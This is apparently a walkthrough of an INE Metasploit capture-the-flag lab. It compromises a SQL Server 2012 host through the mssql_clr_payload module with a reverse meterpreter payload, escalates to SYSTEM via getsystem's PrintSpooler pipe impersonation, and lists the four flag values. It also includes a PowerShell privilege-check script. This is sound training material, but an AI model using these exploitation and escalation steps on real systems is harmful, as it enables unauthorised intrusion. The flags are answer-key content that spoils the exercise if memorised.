INE - The Metasploit Framework CTF

The target machine will be accessible at target.ine.local.

Objective: Use Metasploit and manual investigation techniques to capture the following flags:

  • Flag 1: Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

  • Flag 2: Locate the second flag within the Windows configuration folder.

  • Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

  • Flag 4: Investigate the Administrator directory to find the fourth flag.

Tools

The best tools for this lab are:

  • Nmap

  • Metasploit Framework

  • mssql

FLAG 1 > Solution

Task > Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag

Target > target.ine.local

In a terminal run resolveip target.ine.local > resolves to 10.3.29.191

run service postgresql start && msfconsole -q > start the database (so scan results are saved to the workspace) and launch the MSF console quietly

workspace -a msf_ctf > create a new msf_ctf workspace

A quick search for the SQL Server port > SQL Server uses several ports for its different components and services; the default for the Database Engine is TCP port 1433.

db_nmap -sS -sV -O 10.3.29.191 > run nmap scan of target within MSF console

run services > 10.3.29.191 1433 tcp ms-sql-s open Microsoft SQL Server 2012 11.00.6020; SP3

search MSSQL 2012 > use exploit/windows/mssql/mssql_clr_payload. This module logs in to the instance with its USERNAME/PASSWORD options (sa with a blank password unless set otherwise), which must be a sysadmin login; it then enables CLR integration and loads a .NET assembly that runs the payload inside the SQL Server process.

set rhosts 10.3.29.191

run

Result:

[!] 10.3.29.191:1433 - Setting EXITFUNC to 'thread' so we don't kill SQL Server
[-] 10.3.29.191:1433 - Exploit aborted due to failure: bad-config: Target SQL server arch is x64, payload architecture is x86
[*] Exploit completed, but no session was created.

The error message shows why the exploit failed: the module defaults to an x86 Meterpreter payload, but the CLR assembly runs inside the 64-bit sqlservr.exe process, so the payload architecture must match the server. Note that the login had already succeeded before the architecture check was reached. Switch to an x64 Meterpreter payload:

set payload windows/x64/meterpreter/reverse_tcp

run

result > a meterpreter session is opened

run getuid > Server username: NT Service\MSSQLSERVER

run shell > to get a shell terminal

cd C:\ then run dir > flag1.txt is listed

run type flag1.txt >

Flag 1 > 669e674ef13c43da96d2d65df0564c71

Flag 2: Locate the second flag within the Windows configuration folder.

A quick search for the Windows configuration folder path gives:

C:\Windows\System32\config (the directory holding the registry hives SAM, SECURITY, SYSTEM and SOFTWARE)

cd \Windows\System32

c:\Windows\System32>cd config > Access is denied. The config directory is ACL'd to SYSTEM and Administrators, and NT Service\MSSQLSERVER is neither, so we lack the privilege to enter it.

I tried various Windows privilege escalation techniques, such as migrating to a higher-privileged process and using incognito for token impersonation, but none of them worked on this server.

After further online research I came across Meterpreter's built-in getsystem command. It attempts to elevate the current user's privileges to the highest level possible, typically NT AUTHORITY\SYSTEM on Windows systems.

How getsystem works: getsystem tries several techniques in sequence (technique 0, the default, means all of them) until one succeeds or all fail. The techniques, as listed by getsystem -h, are:

  1. Named Pipe Impersonation (In Memory/Admin):

  • Creates a named pipe, has a SYSTEM service connect to it and impersonates the client's token.

  • Requires an elevated (administrator) token.

  2. Named Pipe Impersonation (Dropper/Admin):

  • Same idea, but temporarily writes a DLL to disk and runs it as a service.

  • Used if the in-memory technique fails; also requires administrator.

  3. Token Duplication (In Memory/Admin):

  • Injects into a SYSTEM-owned process and duplicates its token.

  • Requires SeDebugPrivilege, i.e. an administrator.

  4. Named Pipe Impersonation (RPCSS variant):

  • Coerces the RPCSS service into connecting to an attacker-controlled pipe.

  • Requires only SeImpersonatePrivilege.

  5. Named Pipe Impersonation (PrintSpooler variant):

  • Coerces the Print Spooler into connecting to the pipe (the PrintSpoofer technique).

  • Requires SeImpersonatePrivilege and a running Spooler service.

  6. Named Pipe Impersonation (EFSRPC variant, also known as EfsPotato):

  • Same approach via the EFS RPC interface.

  • Requires SeImpersonatePrivilege.

The last three are what matter here: service accounts such as NT Service\MSSQLSERVER hold SeImpersonatePrivilege by default even though they are not administrators. That is why the admin-only techniques (and the earlier migrate/incognito attempts) fail while a pipe-impersonation variant can still succeed.

Using getsystem

  1. Check current privileges: before running getsystem, check what you already have:

getuid

  • If the output is NT AUTHORITY\SYSTEM, you already have the highest privileges.

  2. Run getsystem to attempt privilege escalation:

getsystem

  3. Verify privileges: after running getsystem, check whether the escalation worked:

getuid

  • If successful, the output should now be NT AUTHORITY\SYSTEM.
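Before running getsystem, the check a practitioner wants is whether the current token even qualifies for any of its techniques, since getuid alone does not show that. The following PowerShell is an added example for this page, not code from the INE lab or from Metasploit. It assumes it is run from the shell obtained on the target (shell, then powershell inside the meterpreter session) on an English-locale Windows, where whoami prints "Enabled"/"Disabled"; the technique numbers follow getsystem -h; the function names are my own.

```powershell
# Added example, not part of the INE lab or of Metasploit itself.
# Run from the cmd shell obtained via meterpreter (shell, then powershell),
# before trying getsystem, to see which technique family can work.
# Assumes an English-locale Windows (whoami prints "Enabled"/"Disabled").

function Get-TokenState {
    # whoami /priv lists every privilege held by the token. "Disabled" means
    # present but not enabled; getsystem enables what it needs itself.
    $privs = @{}
    foreach ($line in (whoami /priv)) {
        if ($line -match '^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$') {
            $privs[$Matches[1]] = $Matches[2]
        }
    }
    $id = [System.Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object System.Security.Principal.WindowsPrincipal($id)
    [pscustomobject]@{
        User       = $id.Name
        # S-1-5-18 is the well-known SID of NT AUTHORITY\SYSTEM
        IsSystem   = ($id.User.Value -eq 'S-1-5-18')
        # True only for an elevated (high-integrity) administrator token;
        # a UAC-filtered admin token reports False, which is what getsystem sees too
        IsAdmin    = $principal.IsInRole([System.Security.Principal.WindowsBuiltInRole]::Administrator)
        Privileges = $privs
    }
}

function Get-GetsystemOutlook {
    $t = Get-TokenState
    $notes = @("Current token: $($t.User)")
    if ($t.IsSystem) {
        $notes += 'Already NT AUTHORITY\SYSTEM; getsystem is not needed.'
        return $notes
    }
    if ($t.IsAdmin) {
        $notes += 'Elevated admin token: techniques 1-3 (named pipe in-memory/dropper, token duplication) should succeed.'
    }
    if ($t.Privileges.ContainsKey('SeImpersonatePrivilege')) {
        $notes += 'SeImpersonatePrivilege held: techniques 4-6 (RPCSS, PrintSpooler, EFSRPC pipe variants) are candidates; this is the service-account path, e.g. NT Service\MSSQLSERVER.'
        $spooler = Get-Service -Name Spooler -ErrorAction SilentlyContinue | Where-Object Status -eq 'Running'
        if (-not $spooler) {
            $notes += 'Print Spooler is not running, so technique 5 will fail; expect 4 or 6 instead.'
        }
    }
    if ($notes.Count -eq 1) {
        $notes += 'Neither elevated admin nor SeImpersonatePrivilege: getsystem will fail; look for another escalation path first.'
    }
    $notes
}

Get-GetsystemOutlook
```

On the lab target the output should report SeImpersonatePrivilege for NT Service\MSSQLSERVER without an elevated admin token, which is consistent with getsystem landing on a pipe-impersonation variant rather than technique 1.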

Therefore, to continue:

run getsystem > ...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).

then run getuid > Server username: NT AUTHORITY\SYSTEM

run shell

cd config > dir

type flag2.txt

Flag 2 > c9c890f24d934dcd896232d58f88915e

Flag 3: The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag

Here we are not given a specific directory, only a hint that the flag is located somewhere under C:\Windows\System32.

On Linux we would use the find command to locate .txt files; since we are dealing with a Windows machine, the cmd equivalent is dir with the /s switch.

Therefore, in the shell run dir /s C:\Windows\System32\*.txt, where /s searches subdirectories and *.txt filters for .txt files. Adding /b prints bare file paths only (no per-directory headers or metadata), but the grouped output below is easier to read when many directories match.

dir /s C:\Windows\System32\*.txt >

We can see the following in the result:

Directory of C:\Windows\system32\drivers\etc

EscaltePrivilageToGetThisFlag.txt 1 File(s)

Therefore, we can navigate to C:\Windows\system32\drivers\etc

run cd C:\Windows\system32\drivers\etc then dir > EscaltePrivilageToGetThisFlag.txt (34 bytes) is listed

run type EscaltePrivilageToGetThisFlag.txt

The file name is itself the hint for the final flag: the Administrator directory requires escalated privileges, which we already have as SYSTEM.

Flag 3> e41c038cd30f464082aa553b2492dc5b

Flag 4: Investigate the Administrator directory to find the fourth flag.

The default home directory for the built-in Administrator account is usually C:\Users\Administrator

In the shell terminal, run cd \Users\Administrator

then run dir

cd Desktop

dir > flag4.txt (34 bytes) is listed

type flag4.txt

Flag 4 > 7144ff5b34ca4aa89a72a5c2316c3a78
